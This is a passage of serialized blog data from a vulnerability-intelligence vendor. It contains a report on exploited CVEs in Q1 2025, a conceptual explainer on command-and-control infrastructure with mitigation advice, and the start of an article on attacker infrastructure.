Thanks",[18,43677,43678],{},"Thanks to Josh Bressers for validating some of my experiences and findings related to ENISA EUVD.",[61,43680,202],{"id":201},[18,43682,40664],{},[18,43684,40667,43685,8659,43688,40676],{},[47,43686,40672],{"href":40670,"rel":43687},[51],[47,43689,1233],{"href":2871,"rel":43690},[51],[2901,43692,43693],{},"html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}",{"title":219,"searchDepth":220,"depth":220,"links":43695},[43696,43697,43698,43705,43708,43709,43710,43714,43715,43716,43717,43718,43719],{"id":43079,"depth":220,"text":43080},{"id":43092,"depth":220,"text":43093},{"id":43119,"depth":220,"text":43120,"children":43699},[43700,43701,43702,43703,43704],{"id":43126,"depth":1266,"text":43127},{"id":43183,"depth":1266,"text":43184},{"id":43193,"depth":1266,"text":43194},{"id":43250,"depth":1266,"text":43251},{"id":43266,"depth":1266,"text":43267},{"id":43326,"depth":220,"text":43327,"children":43706},[43707],{"id":43330,"depth":1266,"text":43331},{"id":43345,"depth":220,"text":43346},{"id":43418,"depth":220,"text":43419},{"id":43453,"depth":220,"text":43454,"children":43711},[43712,43713],{"id":43457,"depth":1266,"text":43458},{"id":43470,"depth":1266,"text":43471},{"id":43619,"depth":220,"text":43620},{"id":43629,"depth":220,"text":43630},{"id":43645,"depth":220,"text":43646},{"id":43667,"depth":220,"text":43668},{"id":43674,"depth":220,"text":43675},{"id":201,"depth":220,"text":202},"2025-05-20","This research aims to share experiences and observations to help others better understand how ENISA EUVD compares with existing vulnerability sources and whether it can serve as a reliable alternative for these established services.",{"slug":43723},"enisa-euvd","\u002Fblog\u002Fenisa-euvd",{"title":43054,"description":43721},"blog\u002Fenisa-euvd",[1280,242,1279],"gyTHvudOZsdKsPLUuJ4EK2IekuUdZ3L5orp9gSO7A3w",{"id":43730,"title":43731,"articles":43732,"authors":43766,"body":43768,"date":43736,"description":43969,"extension":234,"image":7,"link":7,"meta":43970,"navigation":237,"path":43972,"seo":43973,"series":7,"stem":43974,"subtype":7,"tags":43975,"__hash__":43976},"blog\u002Fblog\u002Fexploitation-trends-q1-2025.md","2025 Q1 Trends in Vulnerability Exploitation",[43733,43737,43740,43743,43747,43750,43754,43758,43762],{"title":43734,"source":14382,"link":43735,"date":43736},"159 CVEs Exploited in Q1 2025 — 28.3% Within 24 Hours of Disclosure","https:\u002F\u002Fthehackernews.com\u002F2025\u002F04\u002F159-cves-exploited-in-q1-2025-283.html","2025-04-24",{"title":3494,"source":3495,"link":43738,"date":43739},"https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-fbi-ic3-verizon-dbir-google-m-trends-reports-are-out-heres-the-conclusions\u002F","2024-04-24",{"title":43741,"source":11228,"link":43742,"date":43736},"VulnCheck spotted 159 actively exploited vulnerabilities in first few months of 2025","https:\u002F\u002Fcyberscoop.com\u002Fvulncheck-known-exploited-cves-q1-2025\u002F",{"title":43744,"source":14386,"link":43745,"date":43746},"159 CVEs Exploited in The Wild in Q1 2025, 8.3% of Vulnerabilities Exploited Within 1-Day","https:\u002F\u002Fcybersecuritynews.com\u002F159-cves-exploited-in-the-wild-in-q1-2025\u002F","2025-04-25",{"title":43748,"source":12153,"link":43749,"date":43746},"Actively exploited CVEs rise in Q1, report finds","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Factively-exploited-cves-rise-in-q1-report-finds",{"title":43751,"source":43752,"link":43753,"date":43746},"Exploited CVEs Rise in Q1 2025, With Faster Turnaround Times","ChannelE2E","https:\u002F\u002Fwww.channele2e.com\u002Fbrief\u002Fexploited-cves-rise-in-q1-2025-with-faster-turnaround-times",{"title":43734,"source":43755,"link":43756,"date":43757},"Energy Central","https:\u002F\u002Fenergycentral.com\u002Fc\u002Fiu\u002F159-cves-exploited-q1-2025-%E2%80%94-283-within-24-hours-disclosure","2025-04-27",{"title":43759,"source":3481,"link":43760,"date":43761},"Samsung admits Galaxy devices can leak passwords through clipboard wormhole","https:\u002F\u002Fwww.theregister.com\u002F2025\u002F04\u002F28\u002Fsecurity_news_in_brief\u002F","2025-04-28",{"title":43763,"source":11218,"link":43764,"date":43765},"Vulnerability Exploitation Is Shifting in 2024-25","https:\u002F\u002Fwww.darkreading.com\u002Fvulnerabilities-threats\u002Fvulnerability-exploitation-shifting-2024-25","2025-04-29",[43767],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":43769,"toc":43959},[43770,43773,43777,43797,43801,43807,43810,43827,43830,43833,43850,43854,43860,43863,43867,43873,43876,43879,43883,43889,43892,43918,43922,43928,43931,43935,43941,43944,43947,43949,43951],[18,43771,43772],{},"In Q1 2025, VulnCheck identified evidence of 159 CVEs publicly disclosed for the first time as exploited in the wild. The disclosure of known exploited vulnerabilities was from 50 different sources. We continue to see vulnerabilities being exploited at a fast pace with 28.3% of vulnerabilities being exploited within 1-day of their CVE disclosure. This trend continues from a similar pace we saw in 2024. This demonstrates the need for defenders to move fast on emerging threats while continuing to burn down their vulnerability debt.",[61,43774,43776],{"id":43775},"here-are-the-key-take-aways-from-our-analysis-and-coverage-of-known-exploited-vulnerabilities","Here are the key take-aways from our analysis and coverage of known exploited vulnerabilities",[22,43778,43779,43782,43785,43788,43791,43794],{},[25,43780,43781],{},"159 KEVs were publicly disclosed in Q1-2025",[25,43783,43784],{},"28.3% of KEVs had exploitation evidence disclosed in \u003C 1-day of a CVE being published",[25,43786,43787],{},"25.8% of KEVs are still awaiting or undergoing analysis by NIST NVD",[25,43789,43790],{},"3.1% of KEVs have been assigned the new \"Deferred\" status by NIST NVD",[25,43792,43793],{},"2 KEVs reported publicly have reserved but unpublished CVEs",[25,43795,43796],{},"1 KEV reported is now rejected",[61,43798,43800],{"id":43799},"what-product-categories-vendors-and-products-were-reported-as-being-exploited","What Product Categories, Vendors and Products were Reported as Being Exploited?",[18,43802,43803],{},[68,43804],{"alt":43805,"src":43806,"width":28205},"Category KEV Trends","\u002Fblog\u002Fexploitation-trends-q1-2025\u002Fkev-categories.png",[18,43808,43809],{},"The top five categories associated with new KEVs in Q1 2025 were:",[22,43811,43812,43815,43818,43821,43824],{},[25,43813,43814],{},"Content Management Systems (CMS) (35)",[25,43816,43817],{},"Network Edge Devices (29)",[25,43819,43820],{},"Operating Systems (24)",[25,43822,43823],{},"Open Source Software (14)",[25,43825,43826],{},"Server Software (14)",[18,43828,43829],{},"These categories commonly include systems that are either internet-facing or accessible to end users. Notably, a relatively low number of KEVs were tied to desktop applications and browsers, which have historically been more frequently exploited. It will be interesting to see if this shift continues in the coming quarters.",[18,43831,43832],{},"Leading vendors and products impacted included:",[22,43834,43835,43838,43841,43844,43847],{},[25,43836,43837],{},"Microsoft Windows (15)",[25,43839,43840],{},"Broadcom VMware (6)",[25,43842,43843],{},"Cyber PowerPanel (5)",[25,43845,43846],{},"Litespeed Technologies (4)",[25,43848,43849],{},"Totolink Routers (4)",[61,43851,43853],{"id":43852},"how-quickly-was-exploitation-evidence-reported","How Quickly Was Exploitation Evidence Reported?",[18,43855,43856],{},[68,43857],{"alt":43858,"src":43859,"width":28205},"Monthly KEV Trends","\u002Fblog\u002Fexploitation-trends-q1-2025\u002Ftime-to-kev.png",[18,43861,43862],{},"When we look at the time from CVE disclosure to exploitation evidence, we can better understand how quickly vulnerabilities are being exploited. We observed 28.3% of KEVs had exploitation evidence disclosed in \u003C 1-day of a CVE being published. 2 KEVs are still in reserved status and 1 was rejected. This appears to be marginally faster than what we saw in 2024 as threat actors continue to move fast on new vulnerabilities.",[61,43864,43866],{"id":43865},"how-many-vulnerabilities-were-reported-as-exploited-each-weekmonth-for-the-first-time","How Many Vulnerabilities were Reported as Exploited Each Week\u002FMonth for the First Time?",[18,43868,43869],{},[68,43870],{"alt":43871,"src":43872,"width":28205},"Weekly\u002FMonthly KEV Trends","\u002Fblog\u002Fexploitation-trends-q1-2025\u002Fweekly-kevs.png",[18,43874,43875],{},"What began as a slow start to the year (likely seasonal) quickly shifted, with a surge toward the back half of the quarter in public exploitation disclosures leading to 159 Known Exploited Vulnerabilities (KEVs) reported in Q1 2025. On average, 11.4 KEVs were disclosed weekly, and 53 per month. While CISA KEV added 73 vulnerabilities during the quarter, only 12 showed no prior public evidence of exploitation.",[18,43877,43878],{},"For defenders, this trend provides valuable insight for capacity planning around emerging, vulnerability-related threats.",[61,43880,43882],{"id":43881},"who-was-the-first-to-publicly-report-exploitation","Who Was the First to Publicly Report Exploitation?",[18,43884,43885],{},[68,43886],{"alt":43887,"src":43888,"width":28205},"KEV Sources","\u002Fblog\u002Fexploitation-trends-q1-2025\u002Fkev-sources.png",[18,43890,43891],{},"In Q1 2025, there were 159 vulnerabilities with publicly disclosed evidence of exploitation sourced from 50 different organizations. Notably, the data showed a long-tail distribution of these disclosures, a valuable trend for defenders seeking actionable threat intelligence.\nBy comparison, Q4 2024 saw 190 exploitation disclosures tied to CVEs. However, 39 were older WordPress vulnerabilities with previously known exploitation activity. After coordinating with Wordfence to assign CVEs, these were officially published, inflating the Q4 total. Excluding them, the adjusted number would be 151.\nTop contributors to disclosing exploitation evidence publicly included:",[22,43893,43894,43897,43900,43903,43906,43909,43912,43915],{},[25,43895,43896],{},"Shadow Server (31)",[25,43898,43899],{},"GreyNoise (17)",[25,43901,43902],{},"CISA KEV (12)",[25,43904,43905],{},"Microsoft (12)",[25,43907,43908],{},"Sentinel One (10)",[25,43910,43911],{},"Cyble (9)",[25,43913,43914],{},"Patchstack (6)",[25,43916,43917],{},"Secure List (5)",[61,43919,43921],{"id":43920},"what-are-the-current-nvdcve-statuses-of-q1-2025-kevs","What are the Current NVD\u002FCVE Statuses of Q1-2025 KEVS?",[18,43923,43924],{},[68,43925],{"alt":43926,"src":43927,"width":28205},"KEV NVD Statuses","\u002Fblog\u002Fexploitation-trends-q1-2025\u002Fnist-nvd-status.png",[18,43929,43930],{},"We wanted to explore the current NVD\u002FCVE statuses of vulnerabilities’ with known exploitation to identify potential gaps in NIST’s NVD coverage. Our analysis found that 25.8% are still awaiting or undergoing analysis, 3.1% have been assigned the new \"Deferred\" status, and 69.2% are marked as \"Analyzed\" or \"Modified.\"",[61,43932,43934],{"id":43933},"a-look-at-q1-2025-known-exploited-vulnerabilities-mapped-to-scoring-system","A Look at Q1 2025 Known Exploited Vulnerabilities Mapped to Scoring System",[18,43936,43937],{},[68,43938],{"alt":43939,"src":43940,"width":28205},"Scoring Systems","\u002Fblog\u002Fexploitation-trends-q1-2025\u002Fkev-scoring-systems.png",[18,43942,43943],{},"When examining the emerging threat use case through the lens of CVSS and EPSS scoring, we used the EPSS scores on the day exploitation evidence became publicly available and any available CVSS score at the time of research. We found that only a handful of vulnerabilities had elevated EPSS scores on the same day as exploitation disclosure, despite being known to have been exploited. This suggests that EPSS is largely a trailing indicator rather than a predictive tool for emerging threats.",[18,43945,43946],{},"Organizations should exercise caution when relying on vulnerability scoring systems for emerging threats.",[61,43948,202],{"id":201},[18,43950,40664],{},[18,43952,40667,43953,8659,43956,40676],{},[47,43954,40672],{"href":40670,"rel":43955},[51],[47,43957,1233],{"href":2871,"rel":43958},[51],{"title":219,"searchDepth":220,"depth":220,"links":43960},[43961,43962,43963,43964,43965,43966,43967,43968],{"id":43775,"depth":220,"text":43776},{"id":43799,"depth":220,"text":43800},{"id":43852,"depth":220,"text":43853},{"id":43865,"depth":220,"text":43866},{"id":43881,"depth":220,"text":43882},{"id":43920,"depth":220,"text":43921},{"id":43933,"depth":220,"text":43934},{"id":201,"depth":220,"text":202},"In Q1 2025, VulnCheck identified evidence of 159 CVEs publicly disclosed for the first time as exploited in the wild.",{"slug":43971},"exploitation-trends-q1-2025","\u002Fblog\u002Fexploitation-trends-q1-2025",{"title":43731,"description":43969},"blog\u002Fexploitation-trends-q1-2025",[1280,242,1279],"fMAzbHxeBpgI-kgma94lSv2eiAPxD6SQ7MRnzDMpR-Y",{"id":43978,"title":43979,"articles":7,"authors":43980,"body":43982,"date":44339,"description":44340,"extension":234,"image":7,"link":7,"meta":44341,"navigation":237,"path":44343,"seo":44344,"series":44345,"stem":44346,"subtype":7,"tags":44347,"__hash__":44348},"blog\u002Fblog\u002Funderstanding-command-control-infrastructure.md","Understanding Command & Control (C2) Infrastructure",[43981],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":43983,"toc":44319},[43984,43987,44001,44005,44008,44011,44022,44030,44034,44037,44069,44073,44076,44090,44094,44097,44101,44104,44108,44111,44122,44125,44129,44132,44136,44140,44160,44164,44168,44171,44175,44178,44182,44185,44199,44202,44206,44209,44220,44223,44227,44230,44241,44245,44248,44274,44278,44281,44284,44310,44313,44316],[18,43985,43986],{},"This knowledgebase article will give insight into:",[22,43988,43989,43992,43995,43998],{},[25,43990,43991],{},"The definition and key features of a C2 infrastructure",[25,43993,43994],{},"The characteristics of a C2-driven attack",[25,43996,43997],{},"Common types of C2 malware",[25,43999,44000],{},"Ways security teams can mitigate risks of C2-based attacks",[61,44002,44004],{"id":44003},"what-is-a-command-control-c2-infrastructure","What is a Command & Control (C2) Infrastructure?",[18,44006,44007],{},"In many ways, a command and control (C2) attack is the threat actor version of using a remote control car or drone. Attackers compromise devices, deploy malware to them, and then remotely control them to further their objectives, such as stealing sensitive data or distributing spam. Command and control (C2 or C&C) infrastructure is the technical foundation of these attacks. By understanding what C2 is and how C2-based attacks work, security teams can improve their effectiveness and reduce an attack’s impact.",[18,44009,44010],{},"“Command and control” refers to the systems that attackers use to communicate with and control the malware running on compromised devices. Through this infrastructure, they can maintain remote, covert control over the victim’s systems to coordinate additional malicious activities like:",[22,44012,44013,44016,44019],{},[25,44014,44015],{},"Deploying additional malware",[25,44017,44018],{},"Exfiltrating data",[25,44020,44021],{},"Controlling botnets",[18,44023,44024,44025,59],{},"C2 infrastructures use various technologies to evade detection, often used as part of an ",[47,44026,44029],{"href":44027,"rel":44028},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Funderstanding-apts",[51],"advanced persistent threat (APT)",[61,44031,44033],{"id":44032},"what-are-the-key-features-of-a-c2-infrastructure","What are the Key Features of a C2 Infrastructure?",[18,44035,44036],{},"To better detect and defend against C2-based attacks, security teams should understand the infrastructure’s key features:",[22,44038,44039,44045,44051,44057,44063],{},[25,44040,44041,44044],{},[295,44042,44043],{},"Remote management",": Threat actors can issue instructions and maintain remote control over compromised devices.",[25,44046,44047,44050],{},[295,44048,44049],{},"Communication protocols and covert channels",": Hidden or disguised channels enable attackers to operate without triggering security alerts.",[25,44052,44053,44056],{},[295,44054,44055],{},"Command execution and data exfiltration",": The infrastructure enables attackers to execute commands on infected machines, helping them steal sensitive information.",[25,44058,44059,44062],{},[295,44060,44061],{},"Installing additional malware",": Attackers can use the C2 infrastructure to install new malware on infected devices for even more control over them.",[25,44064,44065,44068],{},[295,44066,44067],{},"Domain Generation Algorithms (DGAs)",": By creating many domain names, the attackers make tracking and blocking all malicious domains a challenge.",[61,44070,44072],{"id":44071},"what-are-command-and-control-attacks","What are Command and Control Attacks?",[18,44074,44075],{},"In a C2-driven attack, threat actors remotely control a target network’s systems with control servers that allow them to execute various suspicious activities. The attackers use covert communication channels to coordinate with the infected machines, enabling them to maintain persistent access to compromised systems, often leading to the following consequences:",[22,44077,44078,44081,44084,44087],{},[25,44079,44080],{},"Ransomware injection",[25,44082,44083],{},"Financial document theft",[25,44085,44086],{},"Business disruption",[25,44088,44089],{},"Corporate or nation-state espionage",[61,44091,44093],{"id":44092},"how-do-c2-driven-attacks-work","How do C2-driven Attacks Work?",[18,44095,44096],{},"C2-driven attacks seek to maintain control over infected devices and compromised systems so that attackers can steal information or disrupt operations. However, they are often more sophisticated than other attack types, requiring a series of coordinated steps to execute successfully.",[993,44098,44100],{"id":44099},"c2-server-setup","C2 Server Setup",[18,44102,44103],{},"The C2 server is the attack’s central hub for managing and controlling compromised devices. Threat actors use the C2 servers to send commands to infected machines while receiving stolen data. The servers maintain a constant communication link with the compromise network so that attackers can execute remote commands and processes.",[993,44105,44107],{"id":44106},"initial-compromise","Initial Compromise",[18,44109,44110],{},"During the initial compromise phase, attackers gain unauthorised access to target systems. Some typical ways they gain initial access include:",[22,44112,44113,44116,44119],{},[25,44114,44115],{},"Deploying phishing attacks to trick people into providing credentials",[25,44117,44118],{},"Exploiting vulnerabilities in software, firmware, and operating systems",[25,44120,44121],{},"Purchasing leaked or stolen credentials on the dark web",[18,44123,44124],{},"This phase establishes a foothold so that they can further infiltrate the network.",[993,44126,44128],{"id":44127},"callback-mechanism-command-and-control-channel","Callback Mechanism (Command and Control Channel)",[18,44130,44131],{},"The callback mechanism, also called the C2 channel, establishes a connection between compromised devices and the C2 server, typically using common network protocols, like HTTP or HTTPS, to hide in normal traffic. Once a device has malware installed, it reaches out to the C2 server to maintain constant communications, often encrypted ones. Since callbacks use legitimate network channels, the malicious operations often remain hidden from detection.",[993,44133,44135],{"id":44134},"command-execution","Command Execution",[993,44137,44139],{"id":44138},"once-attackers-establish-a-c2-connection-they-often-send-compromised-devices-additional-instructions-which-is-the-command-execution-phase-some-examples-of-what-attackers-do-when-they-can-remotely-control-and-manage-compromised-devices-include","Once attackers establish a C2 connection, they often send compromised devices additional instructions which is the command execution phase. Some examples of what attackers do when they can remotely control and manage compromised devices include",[22,44141,44142,44148,44154],{},[25,44143,44144],{},[993,44145,44147],{"id":44146},"forcing-them-to-install-additional-malware-payloads-which-extends-attacker-control-over-the-system","Forcing them to install additional malware payloads which extends attacker control over the system",[25,44149,44150],{},[993,44151,44153],{"id":44152},"using-the-infrastructure-a-hub-for-controlling-a-botnet-and-sending-it-commands-from-a-central-point-to-each-compromised-machine","Using the infrastructure a hub for controlling a botnet and sending it commands from a central point to each compromised machine",[25,44155,44156],{},[993,44157,44159],{"id":44158},"downloading-and-executing-ransomware-and-encryption-keys","Downloading and executing ransomware and encryption keys",[993,44161,44163],{"id":44162},"through-command-execution-they-can-manipulate-compromised-systems-to-achieve-additional-objectives-or-adjust-strategies","Through command execution, they can manipulate compromised systems to achieve additional objectives or adjust strategies",[993,44165,44167],{"id":44166},"lateral-movement-and-persistence","Lateral Movement and Persistence",[18,44169,44170],{},"After gaining initial access, attackers compromise other machines and gather additional credentials. Escalating privileges, like gaining administrative access to a database, enables them to access more business-critical systems and data. As they move across the networks, they can hide from security teams more effectively, remaining undetected and expanding their influence.",[993,44172,44174],{"id":44173},"data-discovery","Data Discovery",[18,44176,44177],{},"As attackers move laterally across networks and systems, they look for critical data, like intellectual property or financial documents. As part of this process, they map the network landscape to understand where sensitive assets reside, enabling them to focus efforts on highly rewarding data while minimizing detection.",[993,44179,44181],{"id":44180},"data-exfiltration","Data Exfiltration",[18,44183,44184],{},"During data exfiltration, the C2 servers may covertly transfer data to the attackers, including:",[22,44186,44187,44190,44193,44196],{},[25,44188,44189],{},"Intellectual property",[25,44191,44192],{},"Personally identifiable information (PII)",[25,44194,44195],{},"Credit card or bank account information",[25,44197,44198],{},"Proprietary documents",[18,44200,44201],{},"Security teams often struggle to identify this data theft since the threat actors use obfuscation techniques, like encryption, to hide in regular network traffic. For financially motivated cybercriminals, these activities may be the end goal since they can sell the data on the dark web.",[993,44203,44205],{"id":44204},"coordinating-sophisticated-attacks","Coordinating Sophisticated Attacks",[18,44207,44208],{},"Since the C2 infrastructure enables persistence, attackers often use it for operations that aim to steal data or disruption systems over long periods of time. For example, they may use it to coordinate larger attacks, like:",[22,44210,44211,44214,44217],{},[25,44212,44213],{},"Supply chain attack",[25,44215,44216],{},"Watering hole attacks targeting less secure endpoints",[25,44218,44219],{},"Deploying rootkits",[18,44221,44222],{},"The C2 infrastructure’s ability to evade detection enables the attackers to strategically navigate and exploit the target network.",[993,44224,44226],{"id":44225},"evasion-techniques","Evasion Techniques",[18,44228,44229],{},"While not a specific “attack phase,” threat actors engage in ongoing activities to maintain stealth, including:",[22,44231,44232,44235,44238],{},[25,44233,44234],{},"Domain hopping by using dynamic domain generation algorithms to create numerous domain names and complicate tracking efforts",[25,44236,44237],{},"Encryption to make any data transfers difficult for security teams to view and mitigate",[25,44239,44240],{},"Transferring traffic through legitimate services to blend into normal network activities",[61,44242,44244],{"id":44243},"common-types-of-c2-malware","Common Types of C2 Malware",[18,44246,44247],{},"Every C2-driven attack incorporates some kind of malicious code that enables the attackers to control the compromised systems. Some of the more common malware variants include:",[22,44249,44250,44256,44262,44268],{},[25,44251,44252,44255],{},[295,44253,44254],{},"Remote Access Trojans (RATs)",": persistent access to target networks enabling attackers to hide in malicious software like email attachments.",[25,44257,44258,44261],{},[295,44259,44260],{},"Botnets",": networks of infected machines used in malicious activities such as sending spam emails or launching attacks.",[25,44263,44264,44267],{},[295,44265,44266],{},"Keyloggers",": capturing sensitive information, like passwords or financial documents, and sending it back to the control server.",[25,44269,44270,44273],{},[295,44271,44272],{},"Backdoors",": providing unauthorized access to systems, allowing additional malware to spread faster.",[61,44275,44277],{"id":44276},"how-to-detect-and-mitigate-c2-attack-risks","How to Detect and Mitigate C2 Attack Risks",[18,44279,44280],{},"While attackers use C2-driven attacks and the associated infrastructure to evade detection, security teams can take some steps to help identify potential compromise and engage in proactive risk mitigation strategies.",[18,44282,44283],{},"To reduce the likelihood that threat actors can successfully deploy a C2-driven attack, organizations can implement the following risk mitigation controls:",[22,44285,44286,44292,44298,44304],{},[25,44287,44288,44291],{},[295,44289,44290],{},"Patch vulnerabilities:"," scan for security weaknesses in operating systems, software, and firmware and apply security updates in a timely manner.",[25,44293,44294,44297],{},[295,44295,44296],{},"Limit user access",": apply the principle of least privilege across all user access with role-based access controls that limit user access to only resources necessary for completing job functions.",[25,44299,44300,44303],{},[295,44301,44302],{},"Monitor network traffic",": create network traffic baselines and monitor for abnormal activity that can indicate potential data exfiltration or remote command execution, like outbound connections to know malicious domains or IP addresses.",[25,44305,44306,44309],{},[295,44307,44308],{},"Incorporate threat intelligence",": leverage insight into actual attacker behavior to identify targeted technologies or vulnerabilities to prioritize monitoring and patching across them.",[18,44311,44312],{},"With VulnCheck’s Exploit Intelligence and IP Intelligence, security teams have access to the most recent threat intelligence about how attackers are acting in the real world. The VulnCheck platform offers life tracking of threat actors C2 infrastructures so that security teams can implement dynamic block lists that proactively remediate attack risk.",[18,44314,44315],{},"WIth the industry’s largest collection of exploit proof of concept code and real-world exploitation data, organizations can prioritize their vulnerability remediation activities more effectively and reduce the likelihood that threat actors can successfully deploy a C2-driven attack.",[44317,44318],"link-cta",{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":44320},[44321,44322,44323,44324,44337,44338],{"id":44003,"depth":220,"text":44004},{"id":44032,"depth":220,"text":44033},{"id":44071,"depth":220,"text":44072},{"id":44092,"depth":220,"text":44093,"children":44325},[44326,44327,44328,44329,44330,44331,44332,44333,44334,44335,44336],{"id":44099,"depth":1266,"text":44100},{"id":44106,"depth":1266,"text":44107},{"id":44127,"depth":1266,"text":44128},{"id":44134,"depth":1266,"text":44135},{"id":44138,"depth":1266,"text":44139},{"id":44162,"depth":1266,"text":44163},{"id":44166,"depth":1266,"text":44167},{"id":44173,"depth":1266,"text":44174},{"id":44180,"depth":1266,"text":44181},{"id":44204,"depth":1266,"text":44205},{"id":44225,"depth":1266,"text":44226},{"id":44243,"depth":220,"text":44244},{"id":44276,"depth":220,"text":44277},"2025-04-21","Exploit Intel 101 - Understanding Command & Control (C2) Infrastructure",{"slug":44342},"understanding-command-control-infrastructure","\u002Fblog\u002Funderstanding-command-control-infrastructure",{"title":43979,"description":44340},{"title":41489,"color":41490,"icon":41491},"blog\u002Funderstanding-command-control-infrastructure",[41494],"OhlYfFj88J1nCd86vU0Jdgf-dDhYt1Uk-x8Ghewrl9A",{"id":44350,"title":44351,"articles":7,"authors":44352,"body":44354,"date":44564,"description":44565,"extension":234,"image":7,"link":7,"meta":44566,"navigation":237,"path":44568,"seo":44569,"series":44570,"stem":44571,"subtype":7,"tags":44572,"__hash__":44573},"blog\u002Fblog\u002Fattacker-infrastructure.md","Attacker Infrastructure",[44353],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":44355,"toc":44550},[44356,44359,44373,44376,44379,44382,44386,44389,44409,44413,44416,44420,44423,44437,44440,44444,44447,44451,44454,44457,44489,44493,44496,44500,44503,44507,44510,44514,44517,44528,44532,44535,44539,44542,44545,44548],[18,44357,44358],{},"This knowledgebase article will support a fundamental understanding of:",[22,44360,44361,44364,44367,44370],{},[25,44362,44363],{},"A fundamental understanding of Attacker Infrastructure and its key components",[25,44365,44366],{},"What the meaning of Command and Control (C2) infrastructure is",[25,44368,44369],{},"Examples of attacks using different pieces of Attacker Infrastructure \u002F C2",[25,44371,44372],{},"How VulnCheck’s IP Intelligence solution can support teams",[18,44374,44375],{},"While the image of a random man in a black hoodie sitting at a computer with dark green code remains pervasive, the reality of modern cyberattacks is that they parallel legitimate business models. Just as an organization maintains a digital infrastructure and associated technology stack, so do cyber attackers.",[18,44377,44378],{},"Attacker infrastructure includes a wide variety of technologies that mirror the ones everyday IT teams use. From command and control (C2) to proxies, attackers use a collection of components to deploy attacks and steal data. Often, companies and attackers use similar technologies with the primary difference being underlying intent.",[18,44380,44381],{},"WIth insight into attacker instructure, security teams can detect signs of compromise and mitigate risk more effectively.",[61,44383,44385],{"id":44384},"what-is-attacker-infrastructure","What is Attacker Infrastructure?",[18,44387,44388],{},"The attacker infrastructure consists of the hardware, software, and cloud assets that malicious actors use to maintain operations. Malicious actors use different technologies to accomplish each phase of an attack. At minimum, attackers incorporate hardware and software components that enable them to:",[22,44390,44391,44394,44397,44400,44403,44406],{},[25,44392,44393],{},"Obfuscate their activities",[25,44395,44396],{},"Send phishing emails",[25,44398,44399],{},"Redirect users and network traffic",[25,44401,44402],{},"Deliver payloads",[25,44404,44405],{},"Remotely control the intended targets",[25,44407,44408],{},"Protect communications between the cybercriminal group and the rest of the infrastructure",[61,44410,44412],{"id":44411},"what-are-the-key-components-of-attacker-infrastructure","What Are the Key Components of Attacker Infrastructure?",[18,44414,44415],{},"To implement appropriate risk mitigation strategies, security teams need to understand what tools and infrastructure attackers use. As attackers often have a complex, comprehensive technology stack, defenders need insight into how each component may interact with their environment. Common infrastructure components include:",[993,44417,44419],{"id":44418},"command-and-control-c2-servers","Command and Control (C2) Servers",[18,44421,44422],{},"Attackers use C2 servers to communicate with their targets, deliver instructions and harvest data. C2 servers comes in two 